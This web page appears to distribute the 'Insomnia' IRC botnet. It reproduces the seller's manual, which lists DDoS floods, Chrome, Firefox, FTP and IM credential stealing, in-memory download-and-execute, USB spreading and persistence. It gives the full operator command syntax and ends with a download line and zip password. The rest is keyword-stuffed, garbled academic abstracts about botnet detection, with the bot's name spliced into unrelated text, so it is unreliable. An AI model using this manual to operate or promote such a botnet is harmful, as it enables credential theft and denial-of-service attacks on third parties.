Insomnia Botnet 2.5 build[ masterscyber ]

 Insomnia is another irc bot sold in hecking forums coded in .NET I m posting the manual here so u can see what it does

Full Text Available Abstract Botnet malware is a malicious program seeding activity in the olfactory mucosa of patients with Fatal Familial Insomnia Botnet

Botnet control DDoS Attacks Credential Stealer Features of Insomnia include: 5 different DDoS methods to initiate distributed




A botnet is a collection of computers that have been infected with viruses that allow nefarious individuals to take control of 8 + BUILDER; Insomnia

insomnia IRC Botnet v2. … A botnet [short for bot network] is a network of hijacked computers and devices infected with bot malware and remotely …

Insomnia IRC botnet description:
INSOMNIA is coded in C# and requires the .NET 2.0 Framework to function properly. It is developed for those who want to target machines running the latest versions of Windows, specifically XP machines with the latest updates up to Vista, Windows 7, and even Windows 8. Because these later versions of windows are bundled with the .NET Framework (3.5+), you will not need to worry about Insomnia losing functionality or low install rates.

Core Features:
– GeoIP for country detection with system locale fallback.
– SSL support for IRC connections
– SOCKS5 server with uPnP for a higher success rate and authentication

Encrypted topic commands with generator (Updating)
– Registry monitor/persistence
– Start Up
– Bot quit messages are specific to the reason the process is ending
Windows is going to sleep…
Windows is shutting down…
Windows is logging off…
– WMI Query for installed AntiVirus and FireWall Software (Vista/7/8)
– Update with MD5 hash check.
– Download and Execute a .NET file in memory.
– Download and execute a file for X seconds before removing.
– RusKill functionality marks files for deletion upon reboot and tries to reverse any changes that were made by other malware.
– 5 different DDoS methods to initiate distributed denial of service attacks against a wide variety of targets:




Apache Remote Memory Exhaustion (A.R.M.E.)
Slowloris
Layer7
Layer4
UDP
– BotKiller that is capable of removing bots such as ngrBot and Aryan that use injected threads in explorer.exe. BotKillers on HF are hardcoded to kill only specific malware, Insomnia on the other hand is coded to watch and detect many different attributes that malware display, making this easily the most effective botkiller on HF.
– FTP Stealer
– IM Stealer
– PW Stealer (Chrome and Firefox)
– Color coding to improve readability.

Command List:
.v – Displays information about the bot including current version, location of the file, MD5 hash, and registry installation location (KCU/HKLM).
.avinfo – Vista+. Queries WMI for the current Antivirus and Firewall programs installed on the client.
.chrome [keyword] – Outputs data from Chrome SQLite databases, works on latest Chrome too (16.x).
.firefox [keyword] – Outputs password data from Mozilla Firefox (latest).
.j #channel – Joins a channel.
.p #channel – Parts a channel.
.sort – Client will join the channels that match the GeoIP/Locale of the system (ex. #US, #RU).
.unsort – Reverses the above sort.
.permsort – Admins join #admins, users join #users.
.twitter “MSG” – Starts twitter spread with the given message. Please make sure your message is incased in quotes so it knows everything to send. More params/options for this coming soon.
.ftp – Steals FTP accounts from FileZilla if installed on the target machine. Support for more coming soon.
.bk – Starts the standard botkiller module. Capable of removing most common HF malware. This function now removes any version of insomnia under v2.0.0.
.bk -i – Capable of removing bots that inject into explorer.exe on 32bit and iexplore.exe on 64bit machines.
.ruskill on/off – New global toggle for ruskill, more like a pDef/Ruskill hybrid. Activating Ruskill on download is no longer needed, just toggle this before and leave running to reverse many changes to the client system.
.rc – Tells the client to reconnect to IRC after 15 seconds have passed.
.up URL MD5 – Updates the binary with the given URL after checking it against the MD5 provided to make sure you are updating to a good file.
.dl URL – Download and executes the given URL.
.dl URL ENVVAR – Download and executes the given URL after dropping to a specific environment variable (ex. APPDATA, TEMP, etc). Case-insensitive.
.dl URL -t SECS – Downloads target URL and waits for the given amount of time before removing the file, if it’s still running.
.dl URL -m – Downloads the target URL into memory without drops, and uses reflection to execute it. Sometimes if the app you download calls exit code of -1, it can kill the host process (insomnia), as well, however the persistence thread should restart it. This command is only for those who have a good reason to use it.
.rm – Ends persistence thread, registry monitor, ruskill, all active DDoS threads, removes registry key, and removes itself.
.m on/off – Toggles mute (when on you won’t get output from any commands).
.arme URL PORT SECS – Starts the Apache Remote Execution DDoS on the target URL.
.http URL PORT SECS – Starts the HTTP (Application Layer 7) DDoS on the target URL.
.tcp URL PORT SECS – Starts the TCP (Transport Layer 4) DDoS on the target URL.
.udp URL PORT SECS – Starts the UDP packet flood on the target URL.
.slow URL PORT SECS – Starts the Slowloris flood on the target URL.
.stop – Aborts any active DDoS threads.
.read URL – Reads encrypted topic commands from an external URL.
.socks – Starts the SOCKS5 server. If you repeat this command again on systems that already have SOCKS server running, it will set a new random password for those connections and output.
.socks user pass – Sets a custom user/pass for already active/new SOCKS servers.
.usb on/off – Toggles the USB LNK automatic spreader. This will spread to all drives that are currently mounted, as well as monitor and spread to all new drives that are plugged in.
.color <on/off> – Toggles IRC color outputs.
.visit URL -h – Visits the specified URL without showing the browser.
.visit URL – Visits the specified URL in the default browser.




Full Text Available Abstract— Insomnia Botnet malware is a malicious program. Insomnia Botnet that infects computers, called bots, will be controlled by a botmaster to do various things such as: spamming, phishing, keylogging Distributed Denial of Service (DDoS and other activities that are generally profitable to the owner of the bot (botmaster or those who use botnet services. The problem is that many computers have been controlled by botnets without the knowledge of the computer owner.  There are many ways to examine botnets, for example by studying the traffic from the botnet network, studying how botnets communicate to each, studying how each robot receives orders to do something, and so forth. Of the many methods, the most frequently and commonly used is the reverse engineering, where researchers study how a botnet works by botnet debugging. In this study the author tries to understand or research botnets by taking a type of botnet, namely Agobot, using reverse engineering.  One of the result of the research is that malware program files in general and in particular botnet has a technique to obscure the way that research using reverse engineering. Another result also shows that the botnet Agobot runs on computers by using the Windows service, and by changing the Windows registry so that every time the computer starts, Agobot always actively works in the computer memory. Keywords— Malware, Bot, Botnet, Botmaster, Agobot, Spam, Distributed Denial of Services, Identity Theft, Computer Security, Reverse Engineering, Debug, Windows Service, the Registry

Insomnia Botnets provide the basis for various cyber-threats. However, setting up a complex botnet infrastructure often involves registration of domain names in the domain name system (DNS). Active as well as passive monitoring approaches can be used in the detection of domains that are registered for




Malware poses one of the major threats to all currently operated computer systems. The scale of the problem becomes obvious by looking at the global economic loss caused by different kinds of malware, which is estimated to be more than US 10 billion every year. Botnets, a special kind of malware, are used to reap economic gains by criminals as well as for politically motivated activities. In contrast to other kinds of malware, botnets utilize a hidden communication channel to receive commands from their operator and communicate their current status. The ability to execute almost arbitrary com

Full Text Available As computer and network technologies evolve, the complexity of cybersecurity has dramatically increased. Advanced cyber threats have led to current approaches to cyber-attack detection becoming ineffective. Many currently used computer systems and applications have never been deeply tested from a cybersecurity point of view and are an easy target for cyber criminals. The paradigm of security by design is still more of a wish than a reality, especially in the context of constantly evolving systems. On the other hand, protection technologies have also improved. Recently, Big Data technologies have given network administrators a wide spectrum of tools to combat cyber threats. In this paper, we present an innovative system for network traffic analysis and anomalies detection to utilise these tools. The systems architecture is based on a Big Data processing framework, data mining, and innovative machine learning techniques. So far, the proposed system implements pattern extraction strategies that leverage batch processing methods. As a use case we consider the problem of botnet detection by means of data in the form of NetFlows. Results are promising and show that the proposed system can be a useful tool to improve cybersecurity.

  1. In Cyber Security world the InsomnIa botnet attacks are increasing. To detect botnet is a challenging task. Botnet is a group of computers connected in a coordinated fashion to do malicious activities. Many techniques have been developed and used to detect and prevent botnet traffic and the attacks. In this paper, a comparative study is done on Genetic Algorithm (GA) and Self Organizing Map (SOM) to detect the botnet network traffic. Both are soft computing techniques and used in this paper as data analytics system. GA is based on natural evolution process and SOM is an Artificial Neural Network type, uses unsupervised learning techniques. SOM uses neurons and classifies the data according to the neurons. Sample of KDD99 dataset is used as input to GA and SOM.




As computer and network technologies evolve, the complexity of cybersecurity has dramatically increased. Advanced cyber threats have led to current approaches to cyber-attack detection becoming ineffective. Many currently used computer systems and applications have never been deeply tested from a cybersecurity point of view and are an easy target for cyber criminals. The paradigm of security by design is still more of a wish than a reality, especially in the context of constantly evolving sys…

insomiNa Botnet detection represents one of the most crucial prerequisites of successful botnet neutralization. This paper explores how accurate and timely detection can be achieved by using supervised machine learning as the tool of inferring about malicious botnet traffic. In order to do so, the paper…… introduces a novel flow-based detection system that relies on supervised machine learning for identifying botnet network traffic. For use in the system we consider eight highly regarded machine learning algorithms, indicating the best performing one. Furthermore, the paper evaluates how much traffic needs…… to accurately and timely detect botnet traffic using purely flow-based traffic analysis and supervised machine learning. Additionally, the results show that in order to achieve accurate detection traffic flows need to be monitored for only a limited time period and number of packets per flow. This indicates

In recent years, insomnia Botnets have been adopted as a popular method to carry and spread many malicious codes on the Internet. These malicious codes pave the way to execute many fraudulent activities including spam mail, distributed denial-of-service attacks and click fraud. While many Botnets are set up using centralized communication architecture, the peer-to-peer (P2P) Botnets can adopt a decentralized architecture using an overlay network for exchanging command and control data making their detection even more difficult. This work presents a method of P2P Bot detection based on an adaptive multilayer feed-forward neural network in cooperation with decision trees. A classification and regression tree is applied as a feature selection technique to select relevant features. With these features, a multilayer feed-forward neural network training model is created using a resilient back-propagation learning algorithm. A comparison of feature set selection based on the decision tree, principal component analysis and the ReliefF algorithm indicated that the neural network model with features selection based on decision tree has a better identification accuracy along with lower rates of false positives. The usefulness of the proposed approach is demonstrated by conducting experiments on real network traffic datasets. In these experiments, an average detection rate of 99.08 % with false positive rate of 0.75 % was observed.

Full Text Available Network-based detection of botnet Command and Control communication is a difficult task if the traffic has a relatively low volume and if popular protocols, such as HTTP, are used to resemble normal traffic. We present a new network-based detection approach that is capable of detecting this type of Command and Control traffic in an enterprise network by estimating the trustworthiness of the traffic destinations. If the destination identifier of a traffic flow origins directly from: human input, prior traffic from a trusted destination, or a defined set of legitimate applications, the destination is trusted and its associated traffic is classified as normal. Advantages of this approach are: the ability of zero day malicious traffic detection, low exposure to malware by passive host-external traffic monitoring, and the applicability for real-time filtering. Experimental evaluation demonstrates successful detection of diverse types of Command and Control Traffic.

Download Insomnia Botnet

Zip Extract Password :www.masterscyber.com